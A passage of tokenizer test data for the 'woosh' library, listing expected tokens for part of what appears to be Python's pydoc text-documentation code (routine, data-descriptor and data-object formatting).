woosh.Token(woosh.DEDENT, ' ', 1469, 0, 1469, 12),
woosh.Token(woosh.DEDENT, '', 1469, 12, 1469, 12),
woosh.Token(woosh.NAME, 'else', 1469, 12, 1469, 16),
woosh.Token(woosh.OP, ':', 1469, 16, 1469, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1469, 17, 1470, 0),
woosh.Token(woosh.INDENT, ' ', 1470, 0, 1470, 16),
woosh.Token(woosh.NAME, 'if', 1470, 16, 1470, 18),
woosh.Token(woosh.NAME, 'object', 1470, 19, 1470, 25),
woosh.Token(woosh.OP, '.', 1470, 25, 1470, 26),
woosh.Token(woosh.NAME, '__self__', 1470, 26, 1470, 34),
woosh.Token(woosh.NAME, 'is', 1470, 35, 1470, 37),
woosh.Token(woosh.NAME, 'not', 1470, 38, 1470, 41),
woosh.Token(woosh.NAME, 'None', 1470, 42, 1470, 46),
woosh.Token(woosh.OP, ':', 1470, 46, 1470, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1470, 47, 1471, 0),
woosh.Token(woosh.INDENT, ' ', 1471, 0, 1471, 20),
woosh.Token(woosh.NAME, 'note', 1471, 20, 1471, 24),
woosh.Token(woosh.OP, '=', 1471, 25, 1471, 26),
woosh.Token(woosh.STRING, "' method of %s instance'", 1471, 27, 1471, 51),
woosh.Token(woosh.OP, '%', 1471, 52, 1471, 53),
woosh.Token(woosh.NAME, 'classname', 1471, 54, 1471, 63),
woosh.Token(woosh.OP, '(', 1471, 63, 1471, 64),
woosh.Token(woosh.NAME, 'object', 1472, 24, 1472, 30),
woosh.Token(woosh.OP, '.', 1472, 30, 1472, 31),
woosh.Token(woosh.NAME, '__self__', 1472, 31, 1472, 39),
woosh.Token(woosh.OP, '.', 1472, 39, 1472, 40),
woosh.Token(woosh.NAME, '__class__', 1472, 40, 1472, 49),
woosh.Token(woosh.OP, ',', 1472, 49, 1472, 50),
woosh.Token(woosh.NAME, 'mod', 1472, 51, 1472, 54),
woosh.Token(woosh.OP, ')', 1472, 54, 1472, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1472, 55, 1473, 0),
woosh.Token(woosh.DEDENT, ' ', 1473, 0, 1473, 16),
woosh.Token(woosh.NAME, 'else', 1473, 16, 1473, 20),
woosh.Token(woosh.OP, ':', 1473, 20, 1473, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1473, 21, 1474, 0),
woosh.Token(woosh.INDENT, ' ', 1474, 0, 1474, 20),
woosh.Token(woosh.NAME, 'note', 1474, 20, 1474, 24),
woosh.Token(woosh.OP, '=', 1474, 25, 1474, 26),
woosh.Token(woosh.STRING, "' unbound %s method'", 1474, 27, 1474, 47),
woosh.Token(woosh.OP, '%', 1474, 48, 1474, 49),
woosh.Token(woosh.NAME, 'classname', 1474, 50, 1474, 59),
woosh.Token(woosh.OP, '(', 1474, 59, 1474, 60),
woosh.Token(woosh.NAME, 'imclass', 1474, 60, 1474, 67),
woosh.Token(woosh.OP, ',', 1474, 67, 1474, 68),
woosh.Token(woosh.NAME, 'mod', 1474, 68, 1474, 71),
woosh.Token(woosh.OP, ')', 1474, 71, 1474, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1474, 72, 1475, 0),
woosh.Token(woosh.DEDENT, ' ', 1476, 0, 1476, 8),
woosh.Token(woosh.DEDENT, '', 1476, 8, 1476, 8),
woosh.Token(woosh.DEDENT, '', 1476, 8, 1476, 8),
woosh.Token(woosh.NAME, 'if', 1476, 8, 1476, 10),
woosh.Token(woosh.OP, '(', 1476, 11, 1476, 12),
woosh.Token(woosh.NAME, 'inspect', 1476, 12, 1476, 19),
woosh.Token(woosh.OP, '.', 1476, 19, 1476, 20),
woosh.Token(woosh.NAME, 'iscoroutinefunction', 1476, 20, 1476, 39),
woosh.Token(woosh.OP, '(', 1476, 39, 1476, 40),
woosh.Token(woosh.NAME, 'object', 1476, 40, 1476, 46),
woosh.Token(woosh.OP, ')', 1476, 46, 1476, 47),
woosh.Token(woosh.NAME, 'or', 1476, 48, 1476, 50),
woosh.Token(woosh.NAME, 'inspect', 1477, 16, 1477, 23),
woosh.Token(woosh.OP, '.', 1477, 23, 1477, 24),
woosh.Token(woosh.NAME, 'isasyncgenfunction', 1477, 24, 1477, 42),
woosh.Token(woosh.OP, '(', 1477, 42, 1477, 43),
woosh.Token(woosh.NAME, 'object', 1477, 43, 1477, 49),
woosh.Token(woosh.OP, ')', 1477, 49, 1477, 50),
woosh.Token(woosh.OP, ')', 1477, 50, 1477, 51),
woosh.Token(woosh.OP, ':', 1477, 51, 1477, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1477, 52, 1478, 0),
woosh.Token(woosh.INDENT, ' ', 1478, 0, 1478, 12),
woosh.Token(woosh.NAME, 'asyncqualifier', 1478, 12, 1478, 26),
woosh.Token(woosh.OP, '=', 1478, 27, 1478, 28),
woosh.Token(woosh.STRING, "'async '", 1478, 29, 1478, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1478, 37, 1479, 0),
woosh.Token(woosh.DEDENT, ' ', 1479, 0, 1479, 8),
woosh.Token(woosh.NAME, 'else', 1479, 8, 1479, 12),
woosh.Token(woosh.OP, ':', 1479, 12, 1479, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1479, 13, 1480, 0),
woosh.Token(woosh.INDENT, ' ', 1480, 0, 1480, 12),
woosh.Token(woosh.NAME, 'asyncqualifier', 1480, 12, 1480, 26),
woosh.Token(woosh.OP, '=', 1480, 27, 1480, 28),
woosh.Token(woosh.STRING, "''", 1480, 29, 1480, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1480, 31, 1481, 0),
woosh.Token(woosh.DEDENT, ' ', 1482, 0, 1482, 8),
woosh.Token(woosh.NAME, 'if', 1482, 8, 1482, 10),
woosh.Token(woosh.NAME, 'name', 1482, 11, 1482, 15),
woosh.Token(woosh.OP, '==', 1482, 16, 1482, 18),
woosh.Token(woosh.NAME, 'realname', 1482, 19, 1482, 27),
woosh.Token(woosh.OP, ':', 1482, 27, 1482, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1482, 28, 1483, 0),
woosh.Token(woosh.INDENT, ' ', 1483, 0, 1483, 12),
woosh.Token(woosh.NAME, 'title', 1483, 12, 1483, 17),
woosh.Token(woosh.OP, '=', 1483, 18, 1483, 19),
woosh.Token(woosh.NAME, 'self', 1483, 20, 1483, 24),
woosh.Token(woosh.OP, '.', 1483, 24, 1483, 25),
woosh.Token(woosh.NAME, 'bold', 1483, 25, 1483, 29),
woosh.Token(woosh.OP, '(', 1483, 29, 1483, 30),
woosh.Token(woosh.NAME, 'realname', 1483, 30, 1483, 38),
woosh.Token(woosh.OP, ')', 1483, 38, 1483, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1483, 39, 1484, 0),
woosh.Token(woosh.DEDENT, ' ', 1484, 0, 1484, 8),
woosh.Token(woosh.NAME, 'else', 1484, 8, 1484, 12),
woosh.Token(woosh.OP, ':', 1484, 12, 1484, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1484, 13, 1485, 0),
woosh.Token(woosh.INDENT, ' ', 1485, 0, 1485, 12),
woosh.Token(woosh.NAME, 'if', 1485, 12, 1485, 14),
woosh.Token(woosh.NAME, 'cl', 1485, 15, 1485, 17),
woosh.Token(woosh.NAME, 'and', 1485, 18, 1485, 21),
woosh.Token(woosh.NAME, 'inspect', 1485, 22, 1485, 29),
woosh.Token(woosh.OP, '.', 1485, 29, 1485, 30),
woosh.Token(woosh.NAME, 'getattr_static', 1485, 30, 1485, 44),
woosh.Token(woosh.OP, '(', 1485, 44, 1485, 45),
woosh.Token(woosh.NAME, 'cl', 1485, 45, 1485, 47),
woosh.Token(woosh.OP, ',', 1485, 47, 1485, 48),
woosh.Token(woosh.NAME, 'realname', 1485, 49, 1485, 57),
woosh.Token(woosh.OP, ',', 1485, 57, 1485, 58),
woosh.Token(woosh.OP, '[', 1485, 59, 1485, 60),
woosh.Token(woosh.OP, ']', 1485, 60, 1485, 61),
woosh.Token(woosh.OP, ')', 1485, 61, 1485, 62),
woosh.Token(woosh.NAME, 'is', 1485, 63, 1485, 65),
woosh.Token(woosh.NAME, 'object', 1485, 66, 1485, 72),
woosh.Token(woosh.OP, ':', 1485, 72, 1485, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1485, 73, 1486, 0),
woosh.Token(woosh.INDENT, ' ', 1486, 0, 1486, 16),
woosh.Token(woosh.NAME, 'skipdocs', 1486, 16, 1486, 24),
woosh.Token(woosh.OP, '=', 1486, 25, 1486, 26),
woosh.Token(woosh.NUMBER, '1', 1486, 27, 1486, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1486, 28, 1487, 0),
woosh.Token(woosh.DEDENT, ' ', 1487, 0, 1487, 12),
woosh.Token(woosh.NAME, 'title', 1487, 12, 1487, 17),
woosh.Token(woosh.OP, '=', 1487, 18, 1487, 19),
woosh.Token(woosh.NAME, 'self', 1487, 20, 1487, 24),
woosh.Token(woosh.OP, '.', 1487, 24, 1487, 25),
woosh.Token(woosh.NAME, 'bold', 1487, 25, 1487, 29),
woosh.Token(woosh.OP, '(', 1487, 29, 1487, 30),
woosh.Token(woosh.NAME, 'name', 1487, 30, 1487, 34),
woosh.Token(woosh.OP, ')', 1487, 34, 1487, 35),
woosh.Token(woosh.OP, '+', 1487, 36, 1487, 37),
woosh.Token(woosh.STRING, "' = '", 1487, 38, 1487, 43),
woosh.Token(woosh.OP, '+', 1487, 44, 1487, 45),
woosh.Token(woosh.NAME, 'realname', 1487, 46, 1487, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1487, 54, 1488, 0),
woosh.Token(woosh.DEDENT, ' ', 1488, 0, 1488, 8),
woosh.Token(woosh.NAME, 'argspec', 1488, 8, 1488, 15),
woosh.Token(woosh.OP, '=', 1488, 16, 1488, 17),
woosh.Token(woosh.NAME, 'None', 1488, 18, 1488, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1488, 22, 1489, 0),
woosh.Token(woosh.NAME, 'if', 1490, 8, 1490, 10),
woosh.Token(woosh.NAME, 'inspect', 1490, 11, 1490, 18),
woosh.Token(woosh.OP, '.', 1490, 18, 1490, 19),
woosh.Token(woosh.NAME, 'isroutine', 1490, 19, 1490, 28),
woosh.Token(woosh.OP, '(', 1490, 28, 1490, 29),
woosh.Token(woosh.NAME, 'object', 1490, 29, 1490, 35),
woosh.Token(woosh.OP, ')', 1490, 35, 1490, 36),
woosh.Token(woosh.OP, ':', 1490, 36, 1490, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1490, 37, 1491, 0),
woosh.Token(woosh.INDENT, ' ', 1491, 0, 1491, 12),
woosh.Token(woosh.NAME, 'try', 1491, 12, 1491, 15),
woosh.Token(woosh.OP, ':', 1491, 15, 1491, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1491, 16, 1492, 0),
woosh.Token(woosh.INDENT, ' ', 1492, 0, 1492, 16),
woosh.Token(woosh.NAME, 'signature', 1492, 16, 1492, 25),
woosh.Token(woosh.OP, '=', 1492, 26, 1492, 27),
woosh.Token(woosh.NAME, 'inspect', 1492, 28, 1492, 35),
woosh.Token(woosh.OP, '.', 1492, 35, 1492, 36),
woosh.Token(woosh.NAME, 'signature', 1492, 36, 1492, 45),
woosh.Token(woosh.OP, '(', 1492, 45, 1492, 46),
woosh.Token(woosh.NAME, 'object', 1492, 46, 1492, 52),
woosh.Token(woosh.OP, ')', 1492, 52, 1492, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1492, 53, 1493, 0),
woosh.Token(woosh.DEDENT, ' ', 1493, 0, 1493, 12),
woosh.Token(woosh.NAME, 'except', 1493, 12, 1493, 18),
woosh.Token(woosh.OP, '(', 1493, 19, 1493, 20),
woosh.Token(woosh.NAME, 'ValueError', 1493, 20, 1493, 30),
woosh.Token(woosh.OP, ',', 1493, 30, 1493, 31),
woosh.Token(woosh.NAME, 'TypeError', 1493, 32, 1493, 41),
woosh.Token(woosh.OP, ')', 1493, 41, 1493, 42),
woosh.Token(woosh.OP, ':', 1493, 42, 1493, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1493, 43, 1494, 0),
woosh.Token(woosh.INDENT, ' ', 1494, 0, 1494, 16),
woosh.Token(woosh.NAME, 'signature', 1494, 16, 1494, 25),
woosh.Token(woosh.OP, '=', 1494, 26, 1494, 27),
woosh.Token(woosh.NAME, 'None', 1494, 28, 1494, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1494, 32, 1495, 0),
woosh.Token(woosh.DEDENT, ' ', 1495, 0, 1495, 12),
woosh.Token(woosh.NAME, 'if', 1495, 12, 1495, 14),
woosh.Token(woosh.NAME, 'signature', 1495, 15, 1495, 24),
woosh.Token(woosh.OP, ':', 1495, 24, 1495, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1495, 25, 1496, 0),
woosh.Token(woosh.INDENT, ' ', 1496, 0, 1496, 16),
woosh.Token(woosh.NAME, 'argspec', 1496, 16, 1496, 23),
woosh.Token(woosh.OP, '=', 1496, 24, 1496, 25),
woosh.Token(woosh.NAME, 'str', 1496, 26, 1496, 29),
woosh.Token(woosh.OP, '(', 1496, 29, 1496, 30),
woosh.Token(woosh.NAME, 'signature', 1496, 30, 1496, 39),
woosh.Token(woosh.OP, ')', 1496, 39, 1496, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1496, 40, 1497, 0),
woosh.Token(woosh.NAME, 'if', 1497, 16, 1497, 18),
woosh.Token(woosh.NAME, 'realname', 1497, 19, 1497, 27),
woosh.Token(woosh.OP, '==', 1497, 28, 1497, 30),
woosh.Token(woosh.STRING, "'<lambda>'", 1497, 31, 1497, 41),
woosh.Token(woosh.OP, ':', 1497, 41, 1497, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1497, 42, 1498, 0),
woosh.Token(woosh.INDENT, ' ', 1498, 0, 1498, 20),
woosh.Token(woosh.NAME, 'title', 1498, 20, 1498, 25),
woosh.Token(woosh.OP, '=', 1498, 26, 1498, 27),
woosh.Token(woosh.NAME, 'self', 1498, 28, 1498, 32),
woosh.Token(woosh.OP, '.', 1498, 32, 1498, 33),
woosh.Token(woosh.NAME, 'bold', 1498, 33, 1498, 37),
woosh.Token(woosh.OP, '(', 1498, 37, 1498, 38),
woosh.Token(woosh.NAME, 'name', 1498, 38, 1498, 42),
woosh.Token(woosh.OP, ')', 1498, 42, 1498, 43),
woosh.Token(woosh.OP, '+', 1498, 44, 1498, 45),
woosh.Token(woosh.STRING, "' lambda '", 1498, 46, 1498, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 1498, 56, 1499, 0),
woosh.Token(woosh.COMMENT, "# XXX lambda's won't usually have func_annotations['return']", 1499, 20, 1499, 80),
woosh.Token(woosh.COMMENT, "# since the syntax doesn't support but it is possible.", 1500, 20, 1500, 74),
woosh.Token(woosh.COMMENT, "# So removing parentheses isn't truly safe.", 1501, 20, 1501, 63),
woosh.Token(woosh.NAME, 'argspec', 1502, 20, 1502, 27),
woosh.Token(woosh.OP, '=', 1502, 28, 1502, 29),
woosh.Token(woosh.NAME, 'argspec', 1502, 30, 1502, 37),
woosh.Token(woosh.OP, '[', 1502, 37, 1502, 38),
woosh.Token(woosh.NUMBER, '1', 1502, 38, 1502, 39),
woosh.Token(woosh.OP, ':', 1502, 39, 1502, 40),
woosh.Token(woosh.OP, '-', 1502, 40, 1502, 41),
woosh.Token(woosh.NUMBER, '1', 1502, 41, 1502, 42),
woosh.Token(woosh.OP, ']', 1502, 42, 1502, 43),
woosh.Token(woosh.COMMENT, '# remove parentheses', 1502, 44, 1502, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1502, 64, 1503, 0),
woosh.Token(woosh.DEDENT, ' ', 1503, 0, 1503, 8),
woosh.Token(woosh.DEDENT, '', 1503, 8, 1503, 8),
woosh.Token(woosh.DEDENT, '', 1503, 8, 1503, 8),
woosh.Token(woosh.NAME, 'if', 1503, 8, 1503, 10),
woosh.Token(woosh.NAME, 'not', 1503, 11, 1503, 14),
woosh.Token(woosh.NAME, 'argspec', 1503, 15, 1503, 22),
woosh.Token(woosh.OP, ':', 1503, 22, 1503, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1503, 23, 1504, 0),
woosh.Token(woosh.INDENT, ' ', 1504, 0, 1504, 12),
woosh.Token(woosh.NAME, 'argspec', 1504, 12, 1504, 19),
woosh.Token(woosh.OP, '=', 1504, 20, 1504, 21),
woosh.Token(woosh.STRING, "'(...)'", 1504, 22, 1504, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1504, 29, 1505, 0),
woosh.Token(woosh.DEDENT, ' ', 1505, 0, 1505, 8),
woosh.Token(woosh.NAME, 'decl', 1505, 8, 1505, 12),
woosh.Token(woosh.OP, '=', 1505, 13, 1505, 14),
woosh.Token(woosh.NAME, 'asyncqualifier', 1505, 15, 1505, 29),
woosh.Token(woosh.OP, '+', 1505, 30, 1505, 31),
woosh.Token(woosh.NAME, 'title', 1505, 32, 1505, 37),
woosh.Token(woosh.OP, '+', 1505, 38, 1505, 39),
woosh.Token(woosh.NAME, 'argspec', 1505, 40, 1505, 47),
woosh.Token(woosh.OP, '+', 1505, 48, 1505, 49),
woosh.Token(woosh.NAME, 'note', 1505, 50, 1505, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1505, 54, 1506, 0),
woosh.Token(woosh.NAME, 'if', 1507, 8, 1507, 10),
woosh.Token(woosh.NAME, 'skipdocs', 1507, 11, 1507, 19),
woosh.Token(woosh.OP, ':', 1507, 19, 1507, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1507, 20, 1508, 0),
woosh.Token(woosh.INDENT, ' ', 1508, 0, 1508, 12),
woosh.Token(woosh.NAME, 'return', 1508, 12, 1508, 18),
woosh.Token(woosh.NAME, 'decl', 1508, 19, 1508, 23),
woosh.Token(woosh.OP, '+', 1508, 24, 1508, 25),
woosh.Token(woosh.STRING, "'\\n'", 1508, 26, 1508, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1508, 30, 1509, 0),
woosh.Token(woosh.DEDENT, ' ', 1509, 0, 1509, 8),
woosh.Token(woosh.NAME, 'else', 1509, 8, 1509, 12),
woosh.Token(woosh.OP, ':', 1509, 12, 1509, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1509, 13, 1510, 0),
woosh.Token(woosh.INDENT, ' ', 1510, 0, 1510, 12),
woosh.Token(woosh.NAME, 'doc', 1510, 12, 1510, 15),
woosh.Token(woosh.OP, '=', 1510, 16, 1510, 17),
woosh.Token(woosh.NAME, 'getdoc', 1510, 18, 1510, 24),
woosh.Token(woosh.OP, '(', 1510, 24, 1510, 25),
woosh.Token(woosh.NAME, 'object', 1510, 25, 1510, 31),
woosh.Token(woosh.OP, ')', 1510, 31, 1510, 32),
woosh.Token(woosh.NAME, 'or', 1510, 33, 1510, 35),
woosh.Token(woosh.STRING, "''", 1510, 36, 1510, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1510, 38, 1511, 0),
woosh.Token(woosh.NAME, 'return', 1511, 12, 1511, 18),
woosh.Token(woosh.NAME, 'decl', 1511, 19, 1511, 23),
woosh.Token(woosh.OP, '+', 1511, 24, 1511, 25),
woosh.Token(woosh.STRING, "'\\n'", 1511, 26, 1511, 30),
woosh.Token(woosh.OP, '+', 1511, 31, 1511, 32),
woosh.Token(woosh.OP, '(', 1511, 33, 1511, 34),
woosh.Token(woosh.NAME, 'doc', 1511, 34, 1511, 37),
woosh.Token(woosh.NAME, 'and', 1511, 38, 1511, 41),
woosh.Token(woosh.NAME, 'self', 1511, 42, 1511, 46),
woosh.Token(woosh.OP, '.', 1511, 46, 1511, 47),
woosh.Token(woosh.NAME, 'indent', 1511, 47, 1511, 53),
woosh.Token(woosh.OP, '(', 1511, 53, 1511, 54),
woosh.Token(woosh.NAME, 'doc', 1511, 54, 1511, 57),
woosh.Token(woosh.OP, ')', 1511, 57, 1511, 58),
woosh.Token(woosh.OP, '.', 1511, 58, 1511, 59),
woosh.Token(woosh.NAME, 'rstrip', 1511, 59, 1511, 65),
woosh.Token(woosh.OP, '(', 1511, 65, 1511, 66),
woosh.Token(woosh.OP, ')', 1511, 66, 1511, 67),
woosh.Token(woosh.OP, '+', 1511, 68, 1511, 69),
woosh.Token(woosh.STRING, "'\\n'", 1511, 70, 1511, 74),
woosh.Token(woosh.OP, ')', 1511, 74, 1511, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1511, 75, 1512, 0),
woosh.Token(woosh.DEDENT, ' ', 1513, 0, 1513, 4),
woosh.Token(woosh.DEDENT, '', 1513, 4, 1513, 4),
woosh.Token(woosh.NAME, 'def', 1513, 4, 1513, 7),
woosh.Token(woosh.NAME, 'docdata', 1513, 8, 1513, 15),
woosh.Token(woosh.OP, '(', 1513, 15, 1513, 16),
woosh.Token(woosh.NAME, 'self', 1513, 16, 1513, 20),
woosh.Token(woosh.OP, ',', 1513, 20, 1513, 21),
woosh.Token(woosh.NAME, 'object', 1513, 22, 1513, 28),
woosh.Token(woosh.OP, ',', 1513, 28, 1513, 29),
woosh.Token(woosh.NAME, 'name', 1513, 30, 1513, 34),
woosh.Token(woosh.OP, '=', 1513, 34, 1513, 35),
woosh.Token(woosh.NAME, 'None', 1513, 35, 1513, 39),
woosh.Token(woosh.OP, ',', 1513, 39, 1513, 40),
woosh.Token(woosh.NAME, 'mod', 1513, 41, 1513, 44),
woosh.Token(woosh.OP, '=', 1513, 44, 1513, 45),
woosh.Token(woosh.NAME, 'None', 1513, 45, 1513, 49),
woosh.Token(woosh.OP, ',', 1513, 49, 1513, 50),
woosh.Token(woosh.NAME, 'cl', 1513, 51, 1513, 53),
woosh.Token(woosh.OP, '=', 1513, 53, 1513, 54),
woosh.Token(woosh.NAME, 'None', 1513, 54, 1513, 58),
woosh.Token(woosh.OP, ')', 1513, 58, 1513, 59),
woosh.Token(woosh.OP, ':', 1513, 59, 1513, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1513, 60, 1514, 0),
woosh.Token(woosh.INDENT, ' ', 1514, 0, 1514, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a data descriptor."""', 1514, 8, 1514, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1514, 63, 1515, 0),
woosh.Token(woosh.NAME, 'results', 1515, 8, 1515, 15),
woosh.Token(woosh.OP, '=', 1515, 16, 1515, 17),
woosh.Token(woosh.OP, '[', 1515, 18, 1515, 19),
woosh.Token(woosh.OP, ']', 1515, 19, 1515, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1515, 20, 1516, 0),
woosh.Token(woosh.NAME, 'push', 1516, 8, 1516, 12),
woosh.Token(woosh.OP, '=', 1516, 13, 1516, 14),
woosh.Token(woosh.NAME, 'results', 1516, 15, 1516, 22),
woosh.Token(woosh.OP, '.', 1516, 22, 1516, 23),
woosh.Token(woosh.NAME, 'append', 1516, 23, 1516, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1516, 29, 1517, 0),
woosh.Token(woosh.NAME, 'if', 1518, 8, 1518, 10),
woosh.Token(woosh.NAME, 'name', 1518, 11, 1518, 15),
woosh.Token(woosh.OP, ':', 1518, 15, 1518, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1518, 16, 1519, 0),
woosh.Token(woosh.INDENT, ' ', 1519, 0, 1519, 12),
woosh.Token(woosh.NAME, 'push', 1519, 12, 1519, 16),
woosh.Token(woosh.OP, '(', 1519, 16, 1519, 17),
woosh.Token(woosh.NAME, 'self', 1519, 17, 1519, 21),
woosh.Token(woosh.OP, '.', 1519, 21, 1519, 22),
woosh.Token(woosh.NAME, 'bold', 1519, 22, 1519, 26),
woosh.Token(woosh.OP, '(', 1519, 26, 1519, 27),
woosh.Token(woosh.NAME, 'name', 1519, 27, 1519, 31),
woosh.Token(woosh.OP, ')', 1519, 31, 1519, 32),
woosh.Token(woosh.OP, ')', 1519, 32, 1519, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1519, 33, 1520, 0),
woosh.Token(woosh.NAME, 'push', 1520, 12, 1520, 16),
woosh.Token(woosh.OP, '(', 1520, 16, 1520, 17),
woosh.Token(woosh.STRING, "'\\n'", 1520, 17, 1520, 21),
woosh.Token(woosh.OP, ')', 1520, 21, 1520, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1520, 22, 1521, 0),
woosh.Token(woosh.DEDENT, ' ', 1521, 0, 1521, 8),
woosh.Token(woosh.NAME, 'doc', 1521, 8, 1521, 11),
woosh.Token(woosh.OP, '=', 1521, 12, 1521, 13),
woosh.Token(woosh.NAME, 'getdoc', 1521, 14, 1521, 20),
woosh.Token(woosh.OP, '(', 1521, 20, 1521, 21),
woosh.Token(woosh.NAME, 'object', 1521, 21, 1521, 27),
woosh.Token(woosh.OP, ')', 1521, 27, 1521, 28),
woosh.Token(woosh.NAME, 'or', 1521, 29, 1521, 31),
woosh.Token(woosh.STRING, "''", 1521, 32, 1521, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1521, 34, 1522, 0),
woosh.Token(woosh.NAME, 'if', 1522, 8, 1522, 10),
woosh.Token(woosh.NAME, 'doc', 1522, 11, 1522, 14),
woosh.Token(woosh.OP, ':', 1522, 14, 1522, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1522, 15, 1523, 0),
woosh.Token(woosh.INDENT, ' ', 1523, 0, 1523, 12),
woosh.Token(woosh.NAME, 'push', 1523, 12, 1523, 16),
woosh.Token(woosh.OP, '(', 1523, 16, 1523, 17),
woosh.Token(woosh.NAME, 'self', 1523, 17, 1523, 21),
woosh.Token(woosh.OP, '.', 1523, 21, 1523, 22),
woosh.Token(woosh.NAME, 'indent', 1523, 22, 1523, 28),
woosh.Token(woosh.OP, '(', 1523, 28, 1523, 29),
woosh.Token(woosh.NAME, 'doc', 1523, 29, 1523, 32),
woosh.Token(woosh.OP, ')', 1523, 32, 1523, 33),
woosh.Token(woosh.OP, ')', 1523, 33, 1523, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1523, 34, 1524, 0),
woosh.Token(woosh.NAME, 'push', 1524, 12, 1524, 16),
woosh.Token(woosh.OP, '(', 1524, 16, 1524, 17),
woosh.Token(woosh.STRING, "'\\n'", 1524, 17, 1524, 21),
woosh.Token(woosh.OP, ')', 1524, 21, 1524, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1524, 22, 1525, 0),
woosh.Token(woosh.DEDENT, ' ', 1525, 0, 1525, 8),
woosh.Token(woosh.NAME, 'return', 1525, 8, 1525, 14),
woosh.Token(woosh.STRING, "''", 1525, 15, 1525, 17),
woosh.Token(woosh.OP, '.', 1525, 17, 1525, 18),
woosh.Token(woosh.NAME, 'join', 1525, 18, 1525, 22),
woosh.Token(woosh.OP, '(', 1525, 22, 1525, 23),
woosh.Token(woosh.NAME, 'results', 1525, 23, 1525, 30),
woosh.Token(woosh.OP, ')', 1525, 30, 1525, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1525, 31, 1526, 0),
woosh.Token(woosh.DEDENT, ' ', 1527, 0, 1527, 4),
woosh.Token(woosh.NAME, 'docproperty', 1527, 4, 1527, 15),
woosh.Token(woosh.OP, '=', 1527, 16, 1527, 17),
woosh.Token(woosh.NAME, 'docdata', 1527, 18, 1527, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1527, 25, 1528, 0),
woosh.Token(woosh.NAME, 'def', 1529, 4, 1529, 7),
woosh.Token(woosh.NAME, 'docother', 1529, 8, 1529, 16),
woosh.Token(woosh.OP, '(', 1529, 16, 1529, 17),
woosh.Token(woosh.NAME, 'self', 1529, 17, 1529, 21),
woosh.Token(woosh.OP, ',', 1529, 21, 1529, 22),
woosh.Token(woosh.NAME, 'object', 1529, 23, 1529, 29),
woosh.Token(woosh.OP, ',', 1529, 29, 1529, 30),
woosh.Token(woosh.NAME, 'name', 1529, 31, 1529, 35),
woosh.Token(woosh.OP, '=', 1529, 35, 1529, 36),
woosh.Token(woosh.NAME, 'None', 1529, 36, 1529, 40),
woosh.Token(woosh.OP, ',', 1529, 40, 1529, 41),
woosh.Token(woosh.NAME, 'mod', 1529, 42, 1529, 45),
woosh.Token(woosh.OP, '=', 1529, 45, 1529, 46),
woosh.Token(woosh.NAME, 'None', 1529, 46, 1529, 50),
woosh.Token(woosh.OP, ',', 1529, 50, 1529, 51),
woosh.Token(woosh.NAME, 'parent', 1529, 52, 1529, 58),
woosh.Token(woosh.OP, '=', 1529, 58, 1529, 59),
woosh.Token(woosh.NAME, 'None', 1529, 59, 1529, 63),
woosh.Token(woosh.OP, ',', 1529, 63, 1529, 64),
woosh.Token(woosh.NAME, 'maxlen', 1529, 65, 1529, 71),
woosh.Token(woosh.OP, '=', 1529, 71, 1529, 72),
woosh.Token(woosh.NAME, 'None', 1529, 72, 1529, 76),
woosh.Token(woosh.OP, ',', 1529, 76, 1529, 77),
woosh.Token(woosh.NAME, 'doc', 1529, 78, 1529, 81),
woosh.Token(woosh.OP, '=', 1529, 81, 1529, 82),
woosh.Token(woosh.NAME, 'None', 1529, 82, 1529, 86),
woosh.Token(woosh.OP, ')', 1529, 86, 1529, 87),
woosh.Token(woosh.OP, ':', 1529, 87, 1529, 88),
woosh.Token(woosh.NEWLINE, '\r\n', 1529, 88, 1530, 0),
woosh.Token(woosh.INDENT, ' ', 1530, 0, 1530, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a data object."""', 1530, 8, 1530, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1530, 59, 1531, 0),
woosh.Token(woosh.NAME, 'repr', 1531, 8, 1531, 12),
woosh.Token(woosh.OP, '=', 1531, 13, 1531, 14),
